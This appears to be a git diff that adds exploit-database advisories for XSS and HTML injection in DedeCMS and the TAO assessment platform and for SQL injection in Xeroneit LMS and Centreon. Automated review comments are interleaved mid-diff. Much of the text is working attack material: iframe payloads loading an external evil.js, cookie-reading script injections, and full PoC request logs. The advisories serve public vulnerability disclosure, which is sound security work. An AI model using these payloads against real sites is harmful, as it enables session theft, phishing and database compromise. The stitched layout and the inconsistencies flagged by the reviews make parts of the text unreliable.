+src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E"> +<iframe +src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E"> +<iframe +src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway="> +<iframe +src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe +src=evil.source +onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en"> +<iframe +src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe +src=evil.source onload=alert(document.domain)>2&langCode=en"> +... + +--- PoC Session Logs [POST] --- (Some Examples ...) +https://test23.localhost:8080/dede/media_main.php +Host: test23.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) +Gecko/20100101 Firefox/74.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 152 +Origin: https://test23.localhost:8080 +Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= +Connection: keep-alive +Referer: https://test23.localhost:8080/dede/media_main.php +Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3; +DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; +DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; +ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php +keyword=>"%20<<img +src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4 +- +POST: HTTP/2.0 200 OK +server: nginx +content-type: text/html; charset=utf-8 +content-length: 1830 +expires: Thu, 19 Nov 1981 08:52:00 GMT +pragma: no-cache +cache-control: 
private +set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon, +06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/ +vary: Accept-Encoding +content-encoding: gzip +x-powered-by: PHP/5.6.40, PleskLin +X-Firefox-Spdy: h2 +--- +https://test23.localhost:8080/dede/file_pic_view.php +?activepath=%2Fuploads%2F>" +<"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0 +Host: test23.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) +Gecko/20100101 Firefox/74.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= +Connection: keep-alive +Referer: +https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0 +Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3; +DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; +DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; +ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/2.0 200 OK +server: nginx +content-type: text/html; charset=utf-8 +x-powered-by: PHP/5.6.40 +expires: Thu, 19 Nov 1981 08:52:00 GMT +pragma: no-cache +cache-control: private +X-Firefox-Spdy: h2 +--- +https://test23.localhost:8080/include/dialog/select_media.php? 
+CKEditor=>"><iframe src=evil.source +onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source +onload=alert("2")>2&langCode=en +Host: test23.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) +Gecko/20100101 Firefox/74.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= +Connection: keep-alive +Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; +DedeUserID__ckMd5=936f42b01c3c7958; +DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; +ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/2.0 200 OK +server: nginx +content-type: text/html; charset=utf-8 +content-length: 1137 +expires: Thu, 19 Nov 1981 08:52:00 GMT +cache-control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +pragma: no-cache +vary: Accept-Encoding +content-encoding: gzip +x-powered-by: PHP/5.6.40, PleskLin +X-Firefox-Spdy: h2 + + +Reference(s): +https://test23.localhost:8080/dede/media_main.php +https://test23.localhost:8080/dede/tags_main.php +https://test23.localhost:8080/dede/file_pic_view.php +https://test23.localhost:8080/dede/file_manage_view.php +https://test23.localhost:8080/include/dialog/select_media.php + + +Solution - Fix & Patch: +======================= +1. Parse the content to disallow html / js and special chars on the +affected input fields +2. Restrict the vulnerable paramter prevent injects via post method request +3. Secure the output location were the content is insecure sanitized +delivered as output + + +Security Risk: +============== +The security risk of the application-side persistent cross site +scripting web vulnerabilities in the different modules are estimated as +medium. 
+ + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. 
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+--
\ No newline at end of file
diff --git a/exploits/php/webapps/48328.txt b/exploits/php/webapps/48328.txt
new file mode 100644
index 000000000..b636c548d
--- /dev/null
+++ b/exploits/php/webapps/48328.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection
+# Google Dork: "LMS v3.0 - Xerone IT "
+# Date: 2020-04-09
+# Exploit Author: Sohel Yousef jellyfish security team
+# Software Link:
+https://xeroneit.net/portfolio/library-management-system-lms
+# Software Demo :https://xeroneit.co/demo/lms/home/login
+# Version: v3.0
+# Category: webapps
+
+1. Description
+scritp has SQLI in books category at this dir
+
+/lms/home/book?category_name=00*SQLI
+
+Error Number: 1064
+
+You have an error in your SQL syntax; check the manual that corresponds to
+your MySQL server version for the right syntax to use near '0' GROUP BY
+`title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3
+
+SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as
+available_book, `book_info`.`number_of_books`, `book_info`.`id`,
+`book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as
+`size`, `book_info`.`publishing_year`, `book_info`.`publisher`,
+`book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`,
+`book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`,
+`book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'',
+category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`,
+`author`, `edition` ORDER BY `title` ASC LIMIT 21
+
+Filename: models/Basic.php
+
+Line Number: 284
\ No newline at end of file
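Review bot: The advisory contradicts itself on the vulnerability class: the `# Title:`, `Vulnerability Class` and the "persistent" wording in the impact paragraph say stored XSS, but the Technical Details state `The attack vector of the vulnerability is non-persistent`, the PoC page is titled `Multiple Non Persistent XSS PoCs`, and every example puts the payload in the GET query string of the same page that renders it, which is reflected XSS. The title also gives the version as `7.5 SP2` while the body consistently says `v5.7 SP2`; the title should be corrected to `DedeCMS 5.7 SP2 - Multiple Reflected Cross-Site Scripting`. `Request Method(s): [+] POST` should also list GET, since the `file_pic_view.php`, `file_manage_view.php`, `tags_main.php` and `select_media.php` examples are all GET requests (only the `media_main.php` `keyword` case is a POST). Finally, the PoCs only execute `alert(document.domain)` from an already-authenticated `/dede/` backend session, so the "session hijacking" impact is asserted rather than shown; either demonstrate cookie access or state plainly that the vectors require a privileged user who opens an attacker-supplied link.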
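Review bot: The PoC request and the error output do not match: the request line is `/lms/home/book?category_name=00*SQLI`, but the quoted query shows `FIND_IN_SET('57'', category_id)`, i.e. the value actually sent was `57'`. The entry should give the exact request that produced the error, `/lms/home/book?category_name=57'`, and say whether `/lms/home/book` is reachable before login (the only demo URL given is `/demo/lms/home/login`, which suggests authentication may be required — confirm). The visible query also shows the injection point is inside the first string argument of `FIND_IN_SET(...)`, so an exploit must close that quote and the function call before appending anything; a syntax error alone does not prove exploitability, and a boolean- or time-based confirmation would make the finding solid. Separately, the verbose database error page (`Filename: models/Basic.php`, `Line Number: 284`, full query echoed) shows the deployment runs with error display enabled, which is an information-disclosure issue worth stating in its own right.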
diff --git a/exploits/php/webapps/48341.txt b/exploits/php/webapps/48341.txt
new file mode 100644
index 000000000..f95c24a2d
--- /dev/null
+++ b/exploits/php/webapps/48341.txt
@@ -0,0 +1,433 @@ +# Title: TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.taotesting.com +# Software Link: https://www.taotesting.com/product/ +# CVE: N/A + +Document Title: +=============== +TAO Open Source Assessment Platform v3.3.0 RC02 - Multiple Web +Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2215 + + +Release Date: +============= +2020-04-16 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2215 + + +Common Vulnerability Scoring System: +==================================== +4 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +500€ - 1.000€ + + +Product & Service Introduction: +=============================== +Accelerating innovation in digital assessment. The TAO assessment +platform gives you the freedom, control, and +support to evolve with today's learners. For organizations who want the +freedom to control their assessment +software – from authoring to delivery to reporting. + +(Copy of the Homepage: https://www.taotesting.com/product/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +cross site vulnerabilities in the TAO Open Source Assessment Platform +v3.3.0 RC02. 
+ + +Affected Product(s): +==================== +Product: TAO Open Source Assessment Platform v3.3.0 RC02 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-16: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +1.1 +A html injection web vulnerability has been discovered in the TAO Open +Source Assessment Platform v3.3.0 RC02 web-application. +The vulnerability allows remote attackers to inject own malicious html +codes with persistent attack vector to compromise browser +to web-application requests from the application-side. + +The html inject web vulnerability is located in the `userFirstName`, +`userLastName`, `userMail`, `password2`, and `password3` +parameters of the user account input field. The request method to inject +is POST and the attack vector is application-side. +Remote attackers are able to inject html code for the user account +credentials to provoke an execution within the main manage +user listing. + +Successful exploitation of the web vulnerability results in persistent +phishing attacks, persistent external redirects to malicious +source and persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Manage Users + +Vulnerable Parameter(s): +[+] userFirstName +[+] userLastName +[+] userMail +[+] password2 +[+] password3 + + + +1.2 +Multiple persistent cross site web vulnerabilities has been discovered +in the TAO Open Source Assessment Platform v3.3.0 RC02. 
+The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent vulnerability is located in the content parameter of the +Rubric Block (Add) module. Attackers are able to inject own malicious +script code inside of the rubric name value. The attached values will be +redisplayed in the frontend of tao. The request method to inject is +POST and the attack vector is located on the application-side. The +injection point is the Rubric Block (Add) module and the execution occurs +in the frontend panel when listing the item attribute. + +Successful exploitation of the web vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected or connected +application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Rubric Block (Add) + +Vulnerable Parameter(s): +[+] content + + +Proof of Concept (PoC): +======================= +1.1 +The persistent html injection web vulnerability can be exploited by +remote attackers with privileged user account and low user interaction. +For security demonstration or to reproduce the security web +vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Install the application and open the ui +2. Move on top right to the user button and click manage users +3. Inject html script code payload into the vulnerable input fields +4. Save the entry +5. Open to the manage users listing +Note: The payloads executes in the table that shows the user account +values for admins +6. Successful reproduce of the html inject vulnerability! 
+ + +PoC: Vulnerable Source (Manage Users) +<th class="actions">Actions</th> +</tr></thead> +<tbody> +<tr data-item-identifier="http_2_localhost_1_tao_0_rdf_3_i1586957152301539"> +<td class="login"><img +src="https://www.evolution-sec.com/evosec-logo.png"></td> +<td class="firstname"><img +src="https://www.evolution-sec.com/evosec-logo.png"></td> +<td class="lastname"><img +src="https://www.evolution-sec.com/evosec-logo.png"></td> +<td class="email"><img +src="https://www.evolution-sec.com/evosec-logo.png"></td> +<td class="roles">Test Taker</td> +<td class="guiLg">German</td> +<td class="status"><span class="icon-result-ok"></span> enabled</td> + + +--- PoC Session Logs (POST) --- +http://localhost:89/tao/Users/edit +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) +Gecko/20100101 Firefox/74.0 +Accept: text/html, */*; q=0.01 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 1393 +Origin: http://localhost:89 +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=users&ext=tao§ion=edit_user +Cookie: tao_GP8CPowQ=d6et7oifjip9jnkbc7pgeotsdj; +tao_0855799=e0a3289004cc96a4ffba7bdcb8515d3665ccd004 +user_form_sent=1&tao.forms.instance=1&token=e0a3289004cc96a4ffba7bdcb8515d3665ccd004&http_2_www_0_w3_0_org_1_2000_1_01_1_ +rdf-schema_3_label=<img +src="https://www.evolution-sec.com/evosec-logo.png">&id=http://localhost/tao.rdf#i1586957152301539 +&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userFirstName=<img +src="https://www.evolution-sec.com/evosec-logo.png"> +&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userLastName=<img +src="https://www.evolution-sec.com/evosec-logo.png"> +&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userMail=<img 
+src="https://www.evolution-sec.com/evosec-logo.png">&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userUILg=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_Langca& +http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userRoles_9=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_DeliveryRole& +classUri=http_2_www_0_tao_0_lu_1_Ontologies_1_TAOSubject_0_rdf_3_Subject&uri=http_2_localhost_1_tao_0_rdf_3_i1586957152301539 +&password2=<img src="https://www.evolution-sec.com/evosec-logo.png"> +&password3=<img src="https://www.evolution-sec.com/evosec-logo.png"> +- +POST: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Set-Cookie: tao_0855799=a4dd4f04e0f27648dcd6ee3e966cdb380d511079; path=/ +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + + +Reference(s): +http://localhost:89/tao/Users/edit +http://localhost:89/tao/Main/index + + + +1.2 +The persistent cross site scripting web vulnerability can be exploited +by remote attackers with privileged user account with low user interaction. +For security demonstration or to reproduce the cross site scripting web +vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open and login to the tao application +2. Move into the test module on top +3. Add new Rubric Block +4. Inject script code test payload into the text label content input field +5. Save the entry and move on the right site to activate +6. The click on activate includes and executes the content immediatly +7. Succesful reproduce of the cross site scripting vulnerability! 
+ + +PoC: Vulnerable Source +<div class="rubricblock-content"><div>asd>"><span +data-serial="img_l9lmylhuv8hf55xo9z264n" +class="widget-box widget-inline widget-img" data-qti-class="img" +contenteditable="false"> +<img data-serial="img_l9lmylhuv8hf55xo9z264n" data-qti-class="img" +src="" alt="" style="" +width="100%"></span> <img data-serial="img_rxephz0lwthtejgsndo2f3" +data-qti-class="img" src="evil.source" alt="" style=""> +>"<script>alert(document.cookie)></script></div></iframe></div></div> +</li></ol> + + +PoC: Payload +"<script>alert(document.cookie)></script> + + +--- PoC Session Logs [POST] --- +http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612 +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 9664 +Origin: http://localhost:89 +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI +Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[], +"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false, +"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":true, 
+"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[], +"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true, +"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses": +false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true, +"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef", +"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}, 
+{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[], +"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl +":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories" +:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[], +"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href": +"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6", +"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": +"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": 
+"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"<script>alert(document.cookie)></script>", +"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"}, +"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No +outcome processing. +Erase the existing rules, if +any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}} +- +POST: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Security-Policy: frame-ancestors 'self' +Content-Length: 14 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/json; charset=UTF-8 +- +http://localhost:89/tao/Main/evil.source +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: image/webp,*/* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +- +GET: HTTP/1.1 200 OK +Server: 
Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 169 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + +Security Risk: +============== +1.1 +The security risk of the html inject web vulnerability in the +web-application is estimated as medium. + +1.2 +The security risk of the persistent cross site scripting web +vulnerability in the web-application is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. 
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/48345.txt b/exploits/php/webapps/48345.txt
new file mode 100644
index 000000000..6a9c7ba07
--- /dev/null
+++ b/exploits/php/webapps/48345.txt
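Review bot: The `Authentication Type` field in 48341.txt states `Restricted authentication (user/moderator) - User privileges`, but both proofs of concept require roles beyond an ordinary user: 1.1 is injected through `Manage Users` (`/tao/Users/edit`) and 1.2 through test authoring (`/taoQtiTest/Creator/saveTest`), so the required privilege level, and the CVSS line that currently reads only `4`, should be stated explicitly (e.g. `Privileges Required: High; vector: <CVSS v3 vector>`). The response headers captured for 1.2 show `Content-Security-Policy: frame-ancestors 'self'`, which only restricts framing and is not a mitigation for the stored script injection shown; worth saying so readers do not mistake it for one. No vendor status or fixed version is given; a line such as `Vendor fix: <version or "unfixed at time of publication">` plus the remediation that the listed user fields and the rubric block `content` must be HTML-encoded on output would complete the entry.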
@@ -0,0 +1,69 @@
+# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection
+# Date: 2020-04-19
+# Exploit Author: Basim alabdullah
+# Vendor Homepage: https://www.centreon.com
+# Software Link: https://download.centreon.com/
+# Version: v.19.10.5
+# Tested on: Centos 5
+
+
+[EXECUTIVE SUMMARY]
+
+ Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web.
+
+ Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust infrastructure systems and network performance monitoring.
+ Downloaded by hundreds and thousands of IT professionals worldwide.
+ The analysis discovered a time-based blind SQL
+ injection vulnerability in the tracker functionality of
+ Centreon Monitoring software. A malicious user can inject arbitrary
+ SQL commands to the application. The vulnerability lies in the project tracker
+ service search functionality; depending on project visibility successful
+ exploitation may require user authentication. A successful attack
+ can read, modify or delete data from the database or execute arbitrary commands on the underlying system.
+
+[VULNERABLE VERSIONS]
+
+ The following version of the Centreon Monitoring was affected by the
+ vulnerability; previous versions may be vulnerable as well:
+ - Centreon version 19.10.5
+
+
+[Proof of Concept]
+
